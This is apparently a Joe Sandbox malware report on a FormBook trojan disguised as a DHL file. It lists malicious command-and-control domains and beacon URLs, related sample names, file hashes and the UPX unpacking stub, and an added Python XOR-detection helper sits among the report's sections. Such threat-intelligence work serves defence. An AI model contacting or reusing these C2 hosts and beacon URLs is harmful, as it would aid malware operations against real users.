                                                      • Avira URL Cloud: safe
                                                      unknown
                                                      http://www.atendefacil.info/gua3/?RZ=0nkpmZbx9Z4P2&BHptZ6F=PEExTvPebnfdN5xst02JMzGti5FnGkiLE22WiywfEIelsbdwqCVd6ByVLBEklw1lRQ+mhNbJQBi9PlJBFsZX42nwE3ew6u8Wba+OVKdJMXKWWGbfqYbjt0U=true
                                                      • Avira URL Cloud: safe
                                                      unknown
                                                      http://www.bloodbalancecaps.shop/qimy/true
                                                      • Avira URL Cloud: safe
                                                      unknown
                                                      http://www.happyjam.life/4ii9/true
                                                      • Avira URL Cloud: safe
                                                      unknown
                                                      http://www.sitioseguro.blog/k4tn/true
                                                      • Avira URL Cloud: safe
                                                      unknown
                                                      http://www.sitioseguro.blog/k4tn/?RZ=0nkpmZbx9Z4P2&BHptZ6F=UszxsXnyXaHrix4mOaqJD7vMyBmxMOeCUNKfuMYEqjdUerJZ7q+fEOQwPEbVbpTJrGRa9GB6/NRWLuSsaWPLUhjS0DDan+QLtyBM3L4kv6zOvH8nY/xHjUE=true
                                                      • Avira URL Cloud: safe
                                                      unknown
http://www.whisperart.net/27s6/ | malicious: true
                                                      • Avira URL Cloud: safe
                                                      unknown
http://www.ana-silverco.shop/ez1t/?BHptZ6F=6fEYs/GnwtqWMztB9xFdTpyVwIgq4y66Lrjdt5EE8ztyQFcx1ZWnbcrnPkjaT/5aXxdNApMw2aINlctYTPbgIAplS4neSxI29SjRMg4iVPNQf+tma6zkIeo=&RZ=0nkpmZbx9Z4P2 | malicious: true
                                                      • Avira URL Cloud: safe
                                                      unknown
http://www.appsolucao.shop/8mlm/?BHptZ6F=Dou+d174n903Q5s8eGVlbncTBC0Rpufru8Nex+2NzpzCLkW84PIBEnPU/VIOuudaHO13J+F+WsJAELWMIa4GeHkI0XjsMpOmPR3vOajhWYhkzVz3w31CV1o=&RZ=0nkpmZbx9Z4P2 | malicious: true
                                                      • Avira URL Cloud: malware
                                                      unknown
http://www.happyjam.life/4ii9/?RZ=0nkpmZbx9Z4P2&BHptZ6F=DCK/bgCIPtpt2RJApr/S57a5c6dyUmc4/YRC2H7mEi+GV8MabGqvART7ZhzmedatEBHVT2HbXE2R9ehhzokwzGc74R/EcNhRi8s6fgxoYqpZFSK7yfL6tiw= | malicious: true
                                                      • Avira URL Cloud: safe
                                                      unknown
http://www.samundri.online/3ifu/ | malicious: true
                                                      • Avira URL Cloud: safe
                                                      unknown
http://www.whisperart.net/27s6/?RZ=0nkpmZbx9Z4P2&BHptZ6F=3HPpqXJ7+KzZdUbztAJQoIdlDoC5J9hYXz+VcheInCeAf0Mmt05i/k62iF4aOsJa+VYW+vyKTPXBSx5msm7TgI/vrOYQcOVU79uPxUHt14iAAYzPN76r48s= | malicious: true
                                                      • Avira URL Cloud: safe
                                                      unknown
http://www.atendefacil.info/gua3/ | malicious: true
                                                      • Avira URL Cloud: safe
                                                      unknown
http://www.remedies.pro/8ewn/?RZ=0nkpmZbx9Z4P2&BHptZ6F=MQU8hgqJCfJkKwurq5QXSTcsAScUHw3Ryuy9I29ewyrFHLJiO5EUJc8dhjLhkP1w+kMFiKX1Jf9ni3jKt1WG/ZpblKXuHNDxI7tmrBLFv1SmPdd+ShDH4FU= | malicious: true
                                                      • Avira URL Cloud: safe
                                                      unknown
http://www.bloodbalancecaps.shop/qimy/?RZ=0nkpmZbx9Z4P2&BHptZ6F=pW0RMLgj0GfOcOfjNX4uT4TVFqcCQcjlkxVMBko6hSeAFIxekhL2UZBCo0je72bj3vEDDI4oJlEiagEhjxGQsrVSq8B3cYE1WLpspuVk6wMXVtPZnEUyIhQ= | malicious: true
                                                      • Avira URL Cloud: safe
                                                      unknown
http://www.t19yd.top/sa1b/ | malicious: true
                                                      • Avira URL Cloud: safe
                                                      unknown
http://www.dating-apps-az-dn5.xyz/tskk/ | malicious: true
                                                      • Avira URL Cloud: safe
                                                      unknown
Name | Source | Malicious | Antivirus Detection | Reputation
https://duckduckgo.com/chrome_newtab | regini.exe, 00000006.00000003.2955752351.000000000794D000.00000004.00000020.00020000.00000000.sdmp | false | - | high
https://duckduckgo.com/ac/?q= | regini.exe, 00000006.00000003.2955752351.000000000794D000.00000004.00000020.00020000.00000000.sdmp | false | - | high
https://www.google.com/images/branding/product/ico/googleg_lodp.ico | regini.exe, 00000006.00000003.2955752351.000000000794D000.00000004.00000020.00020000.00000000.sdmp | false | - | high
https://kb.fastpanel.direct/troubleshoot/ | regini.exe, 00000006.00000002.4821060056.0000000005EC0000.00000004.00000800.00020000.00000000.sdmp, regini.exe, 00000006.00000002.4819056247.00000000049C8000.00000004.10000000.00040000.00000000.sdmp, RsbLJIqaDYs.exe, 00000007.00000002.4817531930.00000000040A8000.00000004.00000001.00040000.00000000.sdmp | false | - | high
http://bloodbalancecaps.shop/qimy/?RZ=0nkpmZbx9Z4P2&BHptZ6F=pW0RMLgj0GfOcOfjNX4uT4TVFqcCQcjlkxVMBko6 | regini.exe, 00000006.00000002.4819056247.0000000005010000.00000004.10000000.00040000.00000000.sdmp, RsbLJIqaDYs.exe, 00000007.00000002.4817531930.00000000046F0000.00000004.00000001.00040000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q= | regini.exe, 00000006.00000003.2955752351.000000000794D000.00000004.00000020.00020000.00000000.sdmp | false | - | high
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command= | regini.exe, 00000006.00000003.2955752351.000000000794D000.00000004.00000020.00020000.00000000.sdmp | false | - | high
https://www.ecosia.org/newtab/ | regini.exe, 00000006.00000003.2955752351.000000000794D000.00000004.00000020.00020000.00000000.sdmp | false | - | high
https://ac.ecosia.org/autocomplete?q= | regini.exe, 00000006.00000003.2955752351.000000000794D000.00000004.00000020.00020000.00000000.sdmp | false | - | high
https://www.google.com | regini.exe, 00000006.00000002.4821060056.0000000005EC0000.00000004.00000800.00020000.00000000.sdmp, regini.exe, 00000006.00000002.4819056247.0000000004B5A000.00000004.10000000.00040000.00000000.sdmp, regini.exe, 00000006.00000002.4819056247.0000000004CEC000.00000004.10000000.00040000.00000000.sdmp, RsbLJIqaDYs.exe, 00000007.00000002.4817531930.00000000043CC000.00000004.00000001.00040000.00000000.sdmp, RsbLJIqaDYs.exe, 00000007.00000002.4817531930.000000000423A000.00000004.00000001.00040000.00000000.sdmp | false | - | high
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search | regini.exe, 00000006.00000003.2955752351.000000000794D000.00000004.00000020.00020000.00000000.sdmp | false | - | high
http://www.bloodbalancecaps.shop | RsbLJIqaDYs.exe, 00000007.00000002.4819665494.00000000051EF000.00000040.80000000.00040000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q= | regini.exe, 00000006.00000003.2955752351.000000000794D000.00000004.00000020.00020000.00000000.sdmp | false | - | high
IP | Domain | Country | ASN | ASN Name | Malicious
13.248.169.48 | www.remedies.pro | United States | 16509 | AMAZON-02US | false
209.74.77.107 | www.happyjam.life | United States | 31744 | MULTIBAND-NEWHOPEUS | true
108.179.253.197 | bloodbalancecaps.shop | United States | 46606 | UNIFIEDLAYER-AS-1US | true
38.47.207.164 | t19yd.top | United States | 174 | COGENT-174US | true
199.59.243.227 | www.whisperart.net | United States | 395082 | BODIS-NJUS | true
84.32.84.32 | appsolucao.shop | Lithuania | 33922 | NTT-LT-ASLT | true
172.67.162.39 | www.sitioseguro.blog | United States | 13335 | CLOUDFLARENETUS | false
104.21.90.137 | www.ana-silverco.shop | United States | 13335 | CLOUDFLARENETUS | false
208.115.225.220 | www.atendefacil.info | United States | 46475 | LIMESTONENETWORKSUS | true
Joe Sandbox version: 41.0.0 Charoite
Analysis ID: 1570251
Start date and time: 2024-12-06 17:34:10 +01:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 10m 25s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of new started processes analysed: 8
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 2
                                                                            Technologies:
                                                                            • HCA enabled
                                                                            • EGA enabled
                                                                            • AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: DHL_734825510.exe
Detection: MAL
Classification: mal100.troj.spyw.evad.winEXE@7/3@15/9
                                                                            EGA Information:
                                                                            • Successful, ratio: 66.7%
                                                                            HCA Information:
                                                                            • Successful, ratio: 86%
                                                                            • Number of executed functions: 54
                                                                            • Number of non-executed functions: 318
                                                                            Cookbook Comments:
                                                                            • Found application associated with file extension: .exe
                                                                            • Override analysis time to 240000 for current running targets taking high CPU consumption
                                                                            • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
                                                                            • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                                                            • Report creation exceeded maximum time and may have missing disassembly code information.
                                                                            • Report size exceeded maximum capacity and may have missing disassembly code.
                                                                            • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                            • VT rate limit hit for: DHL_734825510.exe
Time | Type | Description
11:36:16 | API Interceptor | 9817440x Sleep call for process: regini.exe modified
Match | Associated Sample Name / URL | Detection | Threat Name | Context
13.248.169.48 | purchase order.exe | malicious | FormBook | www.aktmarket.xyz/wb7v/
13.248.169.48 | SRT68.exe | malicious | FormBook | www.avalanchefi.xyz/vxa5/
13.248.169.48 | ek8LkB2Cgo.exe | malicious | FormBook | www.remedies.pro/4azw/
13.248.169.48 | Document_084462.scr.exe | malicious | FormBook, GuLoader | www.optimismbank.xyz/98j3/?2O=jo1iJOnj8ueGZPJDfvyWmhhX4bGAJjt1DdtSaCSQL5v3UEYBE5VATgnqgu9yCYXU1qT81UG2HbOLQLBbZNDoJaqiWagLaQ4MrpZVJnF4w7w/HKU2baOdEb4=&ChhG6=J-xs
13.248.169.48 | Pp7OXMFwqhXKx5Y.exe | malicious | FormBook | www.smartgov.shop/1cwp/
13.248.169.48 | SW_5724.exe | malicious | FormBook | www.egyshare.xyz/440l/
13.248.169.48 | attached invoice.exe | malicious | FormBook | www.aktmarket.xyz/wb7v/
13.248.169.48 | YH-3-12-2024-GDL Units - Projects.exe | malicious | FormBook | www.tals.xyz/k1td/
13.248.169.48 | Proforma invoice - Arancia NZ.exe | malicious | FormBook | www.optimismbank.xyz/98j3/
13.248.169.48 | lKvXJ7VVCK.exe | malicious | FormBook | www.avalanchefi.xyz/ctta/
209.74.77.107 | SRT68.exe | malicious | FormBook | www.liveplah.live/2bf0/
209.74.77.107 | UPDATED CONTRACT.exe | malicious | FormBook | www.gadgetre.info/8q8w/
209.74.77.107 | PO 4110007694.exe | malicious | FormBook | www.learnwithus.site/alu5/
209.74.77.107 | Latest advice payment.exe | malicious | FormBook | www.learnwithus.site/alu5/
209.74.77.107 | SW_5724.exe | malicious | FormBook | www.happyjam.life/4ii9/
209.74.77.107 | quotation.exe | malicious | FormBook | www.gadgetre.info/8q8w/
209.74.77.107 | Quotation Validity.exe | malicious | FormBook, PureLog Stealer | www.beyondfitness.live/fbpt/
209.74.77.107 | specifications.exe | malicious | FormBook, PureLog Stealer | www.gadgetre.info/8q8w/
209.74.77.107 | OUTSTANDING BALANCE PAYMENT.exe | malicious | FormBook | www.learnwithus.site/alu5/
209.74.77.107 | ARRIVAL NOTICE.exe | malicious | FormBook, PureLog Stealer | www.gadgetre.info/8q8w/
Match | Associated Sample Name / URL | Detection | Threat Name | Context
www.remedies.pro | SRT68.exe | malicious | FormBook | 13.248.169.48
www.remedies.pro | ek8LkB2Cgo.exe | malicious | FormBook | 13.248.169.48
www.remedies.pro | SW_5724.exe | malicious | FormBook | 13.248.169.48
www.remedies.pro | CV_ Filipa Barbosa.exe | malicious | FormBook | 13.248.169.48
www.remedies.pro | CV_ Filipa Barbosa.exe | malicious | FormBook | 13.248.169.48
www.whisperart.net | SW_5724.exe | malicious | FormBook | 199.59.243.227
www.whisperart.net | file.exe | malicious | FormBook | 199.59.243.227
www.sitioseguro.blog | SW_5724.exe | malicious | FormBook | 104.21.15.100
www.sitioseguro.blog | file.exe | malicious | FormBook | 172.67.162.39
www.sitioseguro.blog | SWIFT COPY 0028_pdf.exe | malicious | FormBook | 172.67.162.39
www.sitioseguro.blog | 5674656777985-069688574654 pdf.exe | malicious | FormBook | 104.21.15.100
www.ana-silverco.shop | UPDATED CONTRACT.exe | malicious | FormBook | 172.67.156.195
www.ana-silverco.shop | SW_5724.exe | malicious | FormBook | 172.67.156.195
www.ana-silverco.shop | quotation.exe | malicious | FormBook | 104.21.90.137
www.ana-silverco.shop | specifications.exe | malicious | FormBook, PureLog Stealer | 104.21.90.137
www.ana-silverco.shop | ARRIVAL NOTICE.exe | malicious | FormBook, PureLog Stealer | 104.21.90.137
www.dating-apps-az-dn5.xyz | Invoice 10493.exe | malicious | FormBook | 199.59.243.227
www.dating-apps-az-dn5.xyz | SW_5724.exe | malicious | FormBook | 199.59.243.227
www.dating-apps-az-dn5.xyz | A2028041200SD.exe | malicious | FormBook | 199.59.243.227
Match | Associated Sample Name / URL | Detection | Threat Name | Context
MULTIBAND-NEWHOPEUS | SRT68.exe | malicious | FormBook | 209.74.77.107
MULTIBAND-NEWHOPEUS | UPDATED CONTRACT.exe | malicious | FormBook | 209.74.77.107
MULTIBAND-NEWHOPEUS | Invoice 10493.exe | malicious | FormBook | 209.74.77.109
MULTIBAND-NEWHOPEUS | PO 4110007694.exe | malicious | FormBook | 209.74.77.107
MULTIBAND-NEWHOPEUS | Latest advice payment.exe | malicious | FormBook | 209.74.77.107
MULTIBAND-NEWHOPEUS | Document_084462.scr.exe | malicious | FormBook, GuLoader | 209.74.77.109
MULTIBAND-NEWHOPEUS | Pp7OXMFwqhXKx5Y.exe | malicious | FormBook | 209.74.79.42
MULTIBAND-NEWHOPEUS | SW_5724.exe | malicious | FormBook | 209.74.77.107
MULTIBAND-NEWHOPEUS | 72STaC6BmljfbIQ.exe | malicious | FormBook | 209.74.79.42
MULTIBAND-NEWHOPEUS | quotation.exe | malicious | FormBook | 209.74.77.107
UNIFIEDLAYER-AS-1US | Shipping Documents 72908672134.exe | malicious | AgentTesla | 192.254.186.165
UNIFIEDLAYER-AS-1US | #U25b6#Ufe0fPlayVoiceMessage9266.eml | malicious | Unknown | 192.185.77.66
UNIFIEDLAYER-AS-1US | main_spc.elf | malicious | Mirai | 173.254.73.204
UNIFIEDLAYER-AS-1US | https://track-004.blogspot.com | malicious | Unknown | 50.87.184.136
UNIFIEDLAYER-AS-1US | https://www.dropbox.com/l/AADbLOqftgPkdsTWgBgFyNpmu-iGeYJGM4I | malicious | Unknown | 192.254.190.193
UNIFIEDLAYER-AS-1US | aU1TV97585.exe | malicious | AgentTesla | 162.241.62.63
UNIFIEDLAYER-AS-1US | 0wxckB4Iba.exe | malicious | AgentTesla, PureLog Stealer | 50.87.144.157
UNIFIEDLAYER-AS-1US | 8JuGuaUaZP.exe | malicious | AgentTesla | 50.87.218.140
UNIFIEDLAYER-AS-1US | #U25b6#Ufe0fPlayVoiceMessage9312.eml | malicious | Unknown | 192.185.77.66
UNIFIEDLAYER-AS-1US | tmp667.HtML.html | malicious | Unknown | 50.116.87.59
COGENT-174US | ALFq7XP17d.lnk | malicious | Unknown | 170.75.168.151
COGENT-174US | jew.arm7.elf | malicious | Mirai | 38.238.232.202
COGENT-174US | jew.m68k.elf | malicious | Unknown | 38.220.172.124
COGENT-174US | i586.elf | malicious | Unknown | 38.59.39.1
COGENT-174US | i686.elf | malicious | Unknown | 167.141.201.7
COGENT-174US | main_spc.elf | malicious | Mirai | 38.1.199.97
COGENT-174US | na.elf | malicious | Unknown | 38.92.8.103
COGENT-174US | pn866G3CCj.lnk | malicious | Unknown | 170.75.168.151
COGENT-174US | QUOTATON-37839993.exe | malicious | FormBook | 206.238.89.119
COGENT-174US | vZAhXkWkDT.lnk | malicious | Unknown | 170.75.168.151
AMAZON-02US | https://app.droplet.io/form/K47rYN | malicious | Unknown | 3.21.252.22
AMAZON-02US | Platinum Hall County, Georgia Proposal (16.6 KB).docx | malicious | KnowBe4 | 108.139.79.89
AMAZON-02US | mipsel.elf | malicious | Gafgyt | 54.171.230.55
AMAZON-02US | i686.elf | malicious | Mirai, Gafgyt | 54.217.10.153
AMAZON-02US | https://www.schneiderpostaccident.com | malicious | Unknown | 52.66.117.206
AMAZON-02US | i686.elf | malicious | Unknown | 54.171.230.55
                                                                            .akcqrfutuo.elfGet hashmaliciousUnknownBrowse
                                                                            • 3.187.21.27
                                                                            arm5.elfGet hashmaliciousUnknownBrowse
                                                                            • 54.171.230.55
                                                                            roze.ppc.elfGet hashmaliciousGafgyt, MiraiBrowse
                                                                            • 34.249.145.219
                                                                            jew.arm7.elfGet hashmaliciousMiraiBrowse
                                                                            • 35.166.239.241
Process: C:\Windows\SysWOW64\regini.exe (a Windows registry tool; that it, rather than the sample itself, writes this database is consistent with the thread-injection and browser-data-harvesting signatures listed above)
File Type: SQLite 3.x database, last written using SQLite version 3042000 (3.42.0), page size 2048, file counter 7, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 7
Category: dropped
Size (bytes): 196608
Entropy (8bit): 1.1220068301579391
Encrypted: false
SSDEEP: 384:r2qOB1nxCkvSAELyKOMq+8JoudpfjOLl:aq+n0E9ELyKOMq+8qu3SJ
MD5: 87EE0BBB38B11E14090EF60A7D56C8B1
SHA1: 37966F94007814B687989937B4A299FA816581ED
SHA-256: 22CD1C8F26B721A19A1E9108D16AB419ABAD17D34ACDA62CAE3004014D88437E
SHA-512: 37572D4B5A336BC8220B9CF64F8F2D6041C68A449C582221C5C62A3BA1D8D4CA5C241C9383038EBF3D2787CF4AB9F7370E1A3C4AC7D6EC0A942FC41CD7917266
Malicious: false
Reputation: moderate, very likely benign file
Preview: "SQLite format 3" followed by the database header; the remainder of the preview is non-printable bytes (shown as dots in the original listing) and is omitted here
Process: C:\Users\user\Desktop\DHL_734825510.exe
File Type: data
Category: dropped
Size (bytes): 289280
Entropy (8bit): 7.991894448424248
Encrypted: true
SSDEEP: 6144:8+2YOa0VFsJf/TJVUb3WGu2kUTVrpyDnu:P2u00V/TJO3WGdPTVrCu
MD5: 180B2D2C57AD92BC6AC58242CC078E4C
SHA1: 5C7252D2702CC78C3DD750BEFB258DA2768FA09A
SHA-256: 09B54E20D985136638D79737FD41E2543607B44409857798A3E4FD5372766B33
SHA-512: 86C9EC1A1C22FC3FD64B4F9AA266CF4AB276B42CF05C7188D4908426F6496469A7BADA9D7BA61776E2082DDEFFDF1F9F49673D7B77C06155C6A2FFE5AA39FA88
Malicious: false
Reputation: low
Preview: ...B5WOG0QYA..6W.G4QYAQBvWOG4QYAQB6WOG4QYAQB6WOG4QYAQB6WOG4Q.AQB8H.I4.P.p.7..f`902q2D8(5U<y"0,X8;gV4y3$,.>!gp..a<-R2aJ9[}AQB6WOGMPP.l"Q.r'S.d!6.,...1>.K.s'S.C....7(.f8:)l"Q.OG4QYAQBf.OGxPXA.&i5OG4QYAQB.WMF?PRAQ.2WOG4QYAQB.COG4AYAQ22WOGtQYQQB6UOG2QYAQB6WIG4QYAQB6'KG4SYAQB6WMGt.YAAB6GOG4QIAQR6WOG4QIAQB6WOG4QYAQB6WOG4QYA.6S/;G4Qm.UB6GOG4.]AQR6WOG4QYAQB6WOG.QY!QB6WOG4QYA (the rest of the preview repeats the 10-character unit QB6WOG4QYA with isolated differences)
Process: C:\Users\user\Desktop\DHL_734825510.exe
File Type: data
Category: dropped
Size (bytes): 289280
Entropy (8bit): 7.991894448424248
Encrypted: true
MD5: 180B2D2C57AD92BC6AC58242CC078E4C
SHA-256: 09B54E20D985136638D79737FD41E2543607B44409857798A3E4FD5372766B33
Malicious: false
Reputation: low
Preview: byte-identical to the preceding dropped file (same SSDEEP, MD5, SHA1, SHA-256 and SHA-512); a second copy of the same 289280-byte blob
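The 289280-byte blob above is flagged as encrypted with an entropy of 7.99, yet its preview cycles through the same ten characters (QB6WOG4QYA) with isolated differences. That is the pattern repeating-key XOR leaves over a run of constant plaintext. The following Python is an added example, not part of the Joe Sandbox report and not code from the sample: it computes the 8-bit Shannon entropy the report displays, runs a lag-match period search over an excerpt of the preview, and takes a per-position majority vote to recover the repeating unit. The excerpt is the ASCII preview as printed (non-printable bytes appear as '.'), so the recovered unit demonstrates the method and is not a verified key; the same functions run unchanged on the raw dropped file.

```python
"""Triage helpers for the dropped-file blobs in the report: 8-bit Shannon
entropy (the 'Entropy (8bit)' field) and a repeating-period check for the
high-entropy 289280-byte blob whose preview cycles through ten characters."""
from collections import Counter
import math


def shannon_entropy(data: bytes) -> float:
    """Entropy in bits per byte: 0.0 for a constant buffer, 8.0 for uniform."""
    if not data:
        return 0.0
    counts = Counter(data)
    total = len(data)
    return -sum((c / total) * math.log2(c / total) for c in counts.values())


def find_period(data: bytes, max_period: int = 64, threshold: float = 0.75):
    """Smallest lag p at which at least `threshold` of the bytes equal the byte
    p positions later. Repeating-key XOR over constant plaintext (zero padding,
    for example) repeats with the key length; random or properly encrypted data
    never reaches the threshold. Returns None when no lag qualifies."""
    for p in range(1, max_period + 1):
        pairs = len(data) - p
        if pairs <= 0:
            break
        matches = sum(1 for i in range(pairs) if data[i] == data[i + p])
        if matches / pairs >= threshold:
            return p
    return None


def majority_unit(data: bytes, period: int) -> bytes:
    """Per-position majority vote across the period: the repeating unit with
    isolated glitches (non-constant plaintext bytes) voted out. If the
    plaintext under the region really was zeros, this is the XOR key itself."""
    return bytes(
        Counter(data[j::period]).most_common(1)[0][0] for j in range(period)
    )


# Constructed excerpt of the 'Preview' field of the 289280-byte dropped file,
# copied from the report. The preview is lossy (non-printable bytes show as
# '.'), so this demonstrates the method rather than recovering a real key.
PREVIEW_EXCERPT = (
    b"QB6WOG4QYA" b".6S/;G4Qm." b"UB6GOG4.]A" b"QR6WOG4QYA" b"QB6WOG.QY!"
    + b"QB6WOG4QYA" * 10
)


def analyse(blob: bytes) -> dict:
    """Entropy, detected period and recovered repeating unit for a blob."""
    period = find_period(blob)
    return {
        "entropy": round(shannon_entropy(blob), 3),
        "period": period,
        "unit": majority_unit(blob, period) if period else None,
    }


if __name__ == "__main__":
    print(analyse(PREVIEW_EXCERPT))
```

On the real file, run analyse() over the full bytes rather than the preview; a period that survives at the default threshold across a 289 KB buffer with entropy near 8 bits is a strong sign of a repeating key, whereas a stream cipher or a block cipher in a chaining mode returns None.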
                                                                            File type:PE32 executable (GUI) Intel 80386, for MS Windows, UPX compressed
                                                                            Entropy (8bit):7.952667114471218
                                                                            TrID:
                                                                            • Win32 Executable (generic) a (10002005/4) 99.39%
                                                                            • UPX compressed Win32 Executable (30571/9) 0.30%
                                                                            • Win32 EXE Yoda's Crypter (26571/9) 0.26%
                                                                            • Generic Win/DOS Executable (2004/3) 0.02%
                                                                            • DOS Executable Generic (2002/1) 0.02%
                                                                            File name:DHL_734825510.exe
                                                                            File size:743'936 bytes
                                                                            MD5:3aae187307a535df90ed8f9faa0341d2
                                                                            SHA1:c3288325246f98f3e388795f7d34d4ce4a8adb08
                                                                            SHA256:00c2d72b6a63a14fbe34e3fb19fad396213bb9be21ff695df527a676b866c8b2
                                                                            SHA512:985ecdf46ebc1b0dde826041bcb0d766f56ccb883c9ea17e44c9eee365789a1756cb04332474cba8893d833544296cd3ea79796c407f9bd94cf5ad89f52b7447
                                                                            SSDEEP:12288:9quErHF6xC9D6DmR1J98w4oknqOOCyQfF5JZPuph9QMbbTDMFgS1zv4ptuF/YXSA:grl6kD68JmlotQfp9m9lbxa4yFwAq
                                                                            TLSH:EBF423898285D9B6C71463754429CDC48A74B4728ECD678F8328FA2FFC21353ED6BA5C
                                                                            File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......6...r}..r}..r}..4,".p}......s}.../..A}.../#..}.../".G}..{.@.{}..{.P.W}..r}..R.....)."}......s}.../..s}..r}T.s}......s}..Richr}.
                                                                            Icon Hash:aaf3e3e3938382a0
                                                                            Entrypoint:0x537a10
                                                                            Entrypoint Section:UPX1
                                                                            Digitally signed:false
                                                                            Imagebase:0x400000
                                                                            Subsystem:windows gui
                                                                            Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                                                                            DLL Characteristics:DYNAMIC_BASE, TERMINAL_SERVER_AWARE
                                                                            Time Stamp:0x6752FFCA [Fri Dec 6 13:44:42 2024 UTC]
                                                                            TLS Callbacks:
                                                                            CLR (.Net) Version:
                                                                            OS Version Major:5
                                                                            OS Version Minor:1
                                                                            File Version Major:5
                                                                            File Version Minor:1
                                                                            Subsystem Version Major:5
                                                                            Subsystem Version Minor:1
                                                                            Import Hash:fc6683d30d9f25244a50fd5357825e79
Instruction (entry-point disassembly at 0x537a10 in UPX1: the standard UPX unpacking stub. esi = 0x4E2000 is the image base 0x400000 plus the UPX1 virtual address 0xe2000, i.e. the start of the packed data; edi = esi - 0xE1000 = 0x401000 is UPX0, the section with no raw data that the original image is decompressed into. The jump targets below are printed relative to the disassembler's own base, not to the image base.)
                                                                            pushad
                                                                            mov esi, 004E2000h
                                                                            lea edi, dword ptr [esi-000E1000h]
                                                                            push edi
                                                                            jmp 00007F73C50BD01Dh
                                                                            nop
                                                                            mov al, byte ptr [esi]
                                                                            inc esi
                                                                            mov byte ptr [edi], al
                                                                            inc edi
                                                                            add ebx, ebx
                                                                            jne 00007F73C50BD019h
                                                                            mov ebx, dword ptr [esi]
                                                                            sub esi, FFFFFFFCh
                                                                            adc ebx, ebx
                                                                            jc 00007F73C50BCFFFh
                                                                            mov eax, 00000001h
                                                                            add ebx, ebx
                                                                            jne 00007F73C50BD019h
                                                                            mov ebx, dword ptr [esi]
                                                                            sub esi, FFFFFFFCh
                                                                            adc ebx, ebx
                                                                            adc eax, eax
                                                                            add ebx, ebx
                                                                            jnc 00007F73C50BD01Dh
                                                                            jne 00007F73C50BD03Ah
                                                                            mov ebx, dword ptr [esi]
                                                                            sub esi, FFFFFFFCh
                                                                            adc ebx, ebx
                                                                            jc 00007F73C50BD031h
                                                                            dec eax
                                                                            add ebx, ebx
                                                                            jne 00007F73C50BD019h
                                                                            mov ebx, dword ptr [esi]
                                                                            sub esi, FFFFFFFCh
                                                                            adc ebx, ebx
                                                                            adc eax, eax
                                                                            jmp 00007F73C50BCFE6h
                                                                            add ebx, ebx
                                                                            jne 00007F73C50BD019h
                                                                            mov ebx, dword ptr [esi]
                                                                            sub esi, FFFFFFFCh
                                                                            adc ebx, ebx
                                                                            adc ecx, ecx
                                                                            jmp 00007F73C50BD064h
                                                                            xor ecx, ecx
                                                                            sub eax, 03h
                                                                            jc 00007F73C50BD023h
                                                                            shl eax, 08h
                                                                            mov al, byte ptr [esi]
                                                                            inc esi
                                                                            xor eax, FFFFFFFFh
                                                                            je 00007F73C50BD087h
                                                                            sar eax, 1
                                                                            mov ebp, eax
                                                                            jmp 00007F73C50BD01Dh
                                                                            add ebx, ebx
                                                                            jne 00007F73C50BD019h
                                                                            mov ebx, dword ptr [esi]
                                                                            sub esi, FFFFFFFCh
                                                                            adc ebx, ebx
                                                                            jc 00007F73C50BCFDEh
                                                                            inc ecx
                                                                            add ebx, ebx
                                                                            jne 00007F73C50BD019h
                                                                            mov ebx, dword ptr [esi]
                                                                            sub esi, FFFFFFFCh
                                                                            adc ebx, ebx
                                                                            jc 00007F73C50BCFD0h
                                                                            add ebx, ebx
                                                                            jne 00007F73C50BD019h
                                                                            mov ebx, dword ptr [esi]
                                                                            sub esi, FFFFFFFCh
                                                                            adc ebx, ebx
                                                                            adc ecx, ecx
                                                                            add ebx, ebx
                                                                            jnc 00007F73C50BD001h
                                                                            jne 00007F73C50BD01Bh
                                                                            mov ebx, dword ptr [esi]
                                                                            sub esi, FFFFFFFCh
                                                                            adc ebx, ebx
                                                                            jnc 00007F73C50BCFF6h
                                                                            add ecx, 02h
                                                                            cmp ebp, FFFFFB00h
                                                                            adc ecx, 02h
                                                                            lea edx, dword ptr [edi+ebp]
                                                                            cmp ebp, FFFFFFFCh
                                                                            jbe 00007F73C50BD020h
                                                                            mov al, byte ptr [edx]
                                                                            Programming Language:
                                                                            • [ASM] VS2013 build 21005
                                                                            • [ C ] VS2013 build 21005
                                                                            • [C++] VS2013 build 21005
                                                                            • [ C ] VS2008 SP1 build 30729
                                                                            • [IMP] VS2008 SP1 build 30729
                                                                            • [ASM] VS2013 UPD4 build 31101
                                                                            • [RES] VS2013 build 21005
                                                                            • [LNK] VS2013 UPD4 build 31101
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0x197374 | 0x424 | .rsrc
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x138000 | 0x5f374 | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x197798 | 0xc | .rsrc
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
